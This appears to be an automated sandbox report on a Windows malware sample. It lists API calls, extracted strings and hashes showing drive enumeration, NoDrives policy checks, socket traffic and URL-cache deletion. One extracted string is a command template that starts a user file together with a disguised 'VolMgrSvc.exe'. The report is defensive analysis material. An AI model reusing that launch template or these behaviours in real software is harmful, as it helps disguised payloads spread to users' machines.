                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3168844106-0
                                                                                • Opcode ID: f3ad203a95010958b8c1f3f107c3da268ef795d58a7c48103c0b3f0c6d45af56
                                                                                • Instruction ID: 37460acbf0a505b6a9388cec97320328f7083b01a8d1f88c89259c7d7d106706
                                                                                • Opcode Fuzzy Hash: f3ad203a95010958b8c1f3f107c3da268ef795d58a7c48103c0b3f0c6d45af56
                                                                                • Instruction Fuzzy Hash: A031E172200315ABC710AFB5ED8CAD7B7A8FF44324F04463EF58AD3280DB79A4449B99
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 0040640B
                                                                                • CoCreateInstance.OLE32(00412920,00000000,00000001,00412900,?), ref: 00406423
                                                                                • wsprintfW.USER32 ref: 00406456
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateInitializeInstancewsprintf
                                                                                • String ID: %comspec%$/c start %s & start %s\VolMgrSvc.exe$Gh@
                                                                                • API String ID: 2038452267-1176807594
                                                                                • Opcode ID: 453316c8e6568e69a2546e2d17e52215310be9e24d50f63276e7ec173b6e4f87
                                                                                • Instruction ID: 2c6fb4a3d0a1bb960828f31a0de6db084021911c18f79e55e776afc792a10ffb
                                                                                • Opcode Fuzzy Hash: 453316c8e6568e69a2546e2d17e52215310be9e24d50f63276e7ec173b6e4f87
                                                                                • Instruction Fuzzy Hash: 1931C975A40208EFCB04DF98D885FDEB7B5EF88704F208199E519A73A5CB74AE81CB54
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E7AC
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E7FB
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E80F
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E827
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: device$deviceType
                                                                                • API String ID: 1602765415-3511266565
                                                                                • Opcode ID: 438aa6f8a1e56f1ba1290af2e787a3c8fe9300d957a7e67b1fd036078c6987af
                                                                                • Instruction ID: 0e4cd8c02c4e5e279ec4fd0352b83bc081febda0d06dc7f405a75fcd32bf7d71
                                                                                • Opcode Fuzzy Hash: 438aa6f8a1e56f1ba1290af2e787a3c8fe9300d957a7e67b1fd036078c6987af
                                                                                • Instruction Fuzzy Hash: AF3109B1E0020ADFCB04DF99D884BAFB7B5EF88304F108569E514A7390D778AA85CB94
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E64C
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E69B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6AF
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: service$serviceType
                                                                                • API String ID: 1602765415-3667235276
                                                                                • Opcode ID: fc8eedfaf3eb06c849d6c627dcf627ee8089590ee6ebef9678790b2faf78124f
                                                                                • Instruction ID: dde9dd1fd58b67a95de0ca68c0f21478634a56bbec0f0045ca3d2b9f6da46dfd
                                                                                • Opcode Fuzzy Hash: fc8eedfaf3eb06c849d6c627dcf627ee8089590ee6ebef9678790b2faf78124f
                                                                                • Instruction Fuzzy Hash: 4F312D70A0010ADFCB04CF96D884BEFB7B5BF58304F508969E515A7390D7799991CF94
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                • String ID: %s%s
                                                                                • API String ID: 1447977647-3252725368
                                                                                • Opcode ID: b1bb112d4c90ed658366957cc38dd4aa79e2f5495822f89f5b4a7354217b67c4
                                                                                • Instruction ID: 9050299abbe0a346d3081233791c3133021d614aeebffb5e53434d9287984c88
                                                                                • Opcode Fuzzy Hash: b1bb112d4c90ed658366957cc38dd4aa79e2f5495822f89f5b4a7354217b67c4
                                                                                • Instruction Fuzzy Hash: 30310DB4C00218DFCB50DF95DC88BEDBBB4FB48304F1085AAE609B6290D7795A84CF5A
                                                                                APIs
                                                                                • GetLogicalDrives.KERNEL32 ref: 00406346
                                                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                                                • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004063DE
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406387
                                                                                • NoDrives, xrefs: 004063B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                • API String ID: 2666887985-3471754645
                                                                                • Opcode ID: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                                                                • Instruction ID: 85ff322c7a95afac5eb7bad71570108e7de378f82f6edd769b1cbb34207a952c
                                                                                • Opcode Fuzzy Hash: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                                                                • Instruction Fuzzy Hash: 7F11D071E40209DBDB10CFD0D946BEEBBB4FB08704F108159E915B7280D7B8A655CF95
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D634
                                                                                  • Part of subcall function 0040D700: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D740
                                                                                  • Part of subcall function 0040D700: CloseHandle.KERNEL32(?), ref: 0040D759
                                                                                • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D68F
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D6CC
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D6D7
                                                                                • DuplicateHandle.KERNEL32(00000000), ref: 0040D6DE
                                                                                • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D6F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 2251373460-0
                                                                                • Opcode ID: df6a6ebe43e350ee9e2e3ef0cc0677f8426168fd7d8f62afba8d156cc08b655c
                                                                                • Instruction ID: f472e5e68ab63b0dd33345cd9092821366bebf82f5afbdb011aebb5a24a45ce9
                                                                                • Opcode Fuzzy Hash: df6a6ebe43e350ee9e2e3ef0cc0677f8426168fd7d8f62afba8d156cc08b655c
                                                                                • Instruction Fuzzy Hash: 5D310A74A00208EFDB04DF98D889B9EBBB5FF49308F0085A9E905A7390D775EA95CF54
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _allshl_aullshr
                                                                                • String ID:
                                                                                • API String ID: 673498613-0
                                                                                • Opcode ID: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                                                                • Instruction ID: 0b1db91c5ce03941f8675f6ecb7f2ec56fce17a7f2d6269111b0fb586e4650a4
                                                                                • Opcode Fuzzy Hash: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                                                                • Instruction Fuzzy Hash: 27111F326005186B8B10EF9EC48268ABBD6EF84361B15C136FC2CDF359D634E9414BD4
                                                                                APIs
                                                                                • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                • htons.WS2_32(?), ref: 00401281
                                                                                • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                • String ID: pdu
                                                                                • API String ID: 2164660128-2320407122
                                                                                • Opcode ID: 7072d3894e9b5df0fcc29a717805562125ff7a0b34c599f89603ca4f9de7a5ac
                                                                                • Instruction ID: 1b6d4435c5f8e1f149c0fb86e6a0c1a3006a9f031597685944d6c13f048a50c8
                                                                                • Opcode Fuzzy Hash: 7072d3894e9b5df0fcc29a717805562125ff7a0b34c599f89603ca4f9de7a5ac
                                                                                • Instruction Fuzzy Hash: E931B2362083009BC710DF69D884A9BBBF4AFC9714F04457EFD9897381D6349914C7AB
                                                                                APIs
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                                  • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                  • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                  • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3966618661-0
                                                                                • Opcode ID: 465430f324d41f9d9d9732ee1befa355f4717a0d242bba6110d7f62502904e98
                                                                                • Instruction ID: 9f2c4cc69d55b471d510ac50d158e14e0eacb849a4393371b11790265c13a883
                                                                                • Opcode Fuzzy Hash: 465430f324d41f9d9d9732ee1befa355f4717a0d242bba6110d7f62502904e98
                                                                                • Instruction Fuzzy Hash: 5841D175604B02ABC714DB38D848797F3A4BF84310F18823EE86D933D1E739A855CB99
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(0041AC50,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B0C8
                                                                                • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B0E9
                                                                                • FlushFileBuffers.KERNEL32(000000FF), ref: 0040B0F3
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040B0FD
                                                                                • InterlockedExchange.KERNEL32(00419828,0000003D), ref: 0040B10A
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                • String ID:
                                                                                • API String ID: 442028454-0
                                                                                • Opcode ID: 5693974f53a6f553ee872c1498f347a7cdbd554753dda3213ec7bc77a9e739f7
                                                                                • Instruction ID: 65abf3b26d1f33ce57344cf3d4c90c2ddc2d392c326f45743aae56010b0155a0
                                                                                • Opcode Fuzzy Hash: 5693974f53a6f553ee872c1498f347a7cdbd554753dda3213ec7bc77a9e739f7
                                                                                • Instruction Fuzzy Hash: D33149B8A40208EBCB14DF94EC45FAEB7B1FB48300F208569E511A7391D775AA51CB9A
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _allshl
                                                                                • String ID:
                                                                                • API String ID: 435966717-0
                                                                                • Opcode ID: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                                                                • Instruction ID: b0d0b2528f3aca05c18ea064ccca22ed782aa92eb9f3aacb3aeadda2a23aac7b
                                                                                • Opcode Fuzzy Hash: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                                                                • Instruction Fuzzy Hash: 92F01272A01414979B14EEFE84424CAF7E59F88374B218176FD1CE3260E570B90546F1
                                                                                APIs
                                                                                • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
                                                                                • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
                                                                                • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
                                                                                  • Part of subcall function 0040A660: HeapFree.KERNEL32(00000000,00000000,00402612,?,00402612,?), ref: 0040A6BB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                • String ID: pdu
                                                                                • API String ID: 309973729-2320407122
                                                                                • Opcode ID: 2fd66f5c1125709e912b082e2c73e8d5efb2a89a668c62a8ecc72b7ea0d0f82b
                                                                                • Instruction ID: 49315f9b5d193dc364c5f28f0bcb7aa8bb44b0403a6660fc991bd28791f727bd
                                                                                • Opcode Fuzzy Hash: 2fd66f5c1125709e912b082e2c73e8d5efb2a89a668c62a8ecc72b7ea0d0f82b
                                                                                • Instruction Fuzzy Hash: A901D6B65003009BCB209F61ECC4D9B7778AF48310708467AFC05AB396CA39E8508775
                                                                                APIs
                                                                                • GetDriveTypeW.KERNEL32(0040629F), ref: 004062CD
                                                                                • QueryDosDeviceW.KERNEL32(0040629F,?,00000208), ref: 0040630C
                                                                                • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406324
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeviceDriveQueryType
                                                                                • String ID: \??\
                                                                                • API String ID: 1681518211-3047946824
                                                                                • Opcode ID: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                                                                • Instruction ID: fe1cba3e8f96ca8ec28924db8accccc61f2e919e988f9d14e04ecf4ac666ff3a
                                                                                • Opcode Fuzzy Hash: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                                                                • Instruction Fuzzy Hash: 1901FFB0A4021CEBCB20DF55DD49BDAB7B4AB04704F00C0BAAA05A7280E6759ED5DF9C
                                                                                APIs
                                                                                • ioctlsocket.WS2_32 ref: 0040112B
                                                                                • recvfrom.WS2_32 ref: 0040119C
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                • String ID:
                                                                                • API String ID: 3980219359-0
                                                                                • Opcode ID: ab8b34524f24c7ff0ec759a8db121372cfa49b223874d41307e8bdf502b19990
                                                                                • Instruction ID: dd229b18b8e608a96638b9a50d19e2d27eaf393d2ffc9a5ffa46aac6cea4a516
                                                                                • Opcode Fuzzy Hash: ab8b34524f24c7ff0ec759a8db121372cfa49b223874d41307e8bdf502b19990
                                                                                • Instruction Fuzzy Hash: 7C21C3B1504301AFD304DF65DC84A6BB7E9EF88318F004A3EF555A6290E774D9588BEA
                                                                                APIs
                                                                                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                • String ID:
                                                                                • API String ID: 2074799992-0
                                                                                • Opcode ID: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                                                                • Instruction ID: 85cdc4ac02e7a7d961e62fa06f42dc9c3305788cd6d7a2bd32de2e1c20a60a18
                                                                                • Opcode Fuzzy Hash: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                                                                • Instruction Fuzzy Hash: DD212F715083159BC200DF55D884D5BB7E8BFCCB54F044A2EF59493291D734EA49CBAA
                                                                                APIs
                                                                                • StrChrA.SHLWAPI(00000000,0000007C), ref: 00407326
                                                                                • DeleteUrlCacheEntry.WININET(00000000), ref: 00407348
                                                                                • Sleep.KERNEL32(000003E8), ref: 00407361
                                                                                • DeleteUrlCacheEntry.WININET(?), ref: 00407389
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CacheDeleteEntry$Sleep
                                                                                • String ID:
                                                                                • API String ID: 672405725-0
                                                                                • Opcode ID: 0889daea8db3d00c114acb4ae5d662601a50873d8cf4ae377a86a09432f2b769
                                                                                • Instruction ID: e789c4acaeed7b47b7c3c4d69342d3bd95a049e3571e2ded942ca122a7fff21c
                                                                                • Opcode Fuzzy Hash: 0889daea8db3d00c114acb4ae5d662601a50873d8cf4ae377a86a09432f2b769
                                                                                • Instruction Fuzzy Hash: A5218175E04208FBDB04DFA4D885B9E7B74AF44309F10C4A9ED416B391D679AB80DB49
                                                                                APIs
                                                                                • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                                                                • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                                                                • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Recv$ErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 3668019968-0
                                                                                • Opcode ID: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                                                                • Instruction ID: df3cbe2ca7d05c2b70b960210cdf5b20c1916dde76b22b2cec88194eea221140
                                                                                • Opcode Fuzzy Hash: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                                                                • Instruction Fuzzy Hash: 6A11AD72148305AFD310CF65EC84AEBB7ECEB88710F40492AF945D2140E679E94997B6
                                                                                APIs
                                                                                • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Send$ErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 2121970615-0
                                                                                • Opcode ID: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                                                                • Instruction ID: 6027246a5f20d5291fae036152240cd5c1f9414458335baedc5b4335fd2ad738
                                                                                • Opcode Fuzzy Hash: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                                                                • Instruction Fuzzy Hash: 8F014F712483046EE7209B96DC88F9B77A8EBC4711F508429F608961C0D7B5A9459B79
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0040D8D9
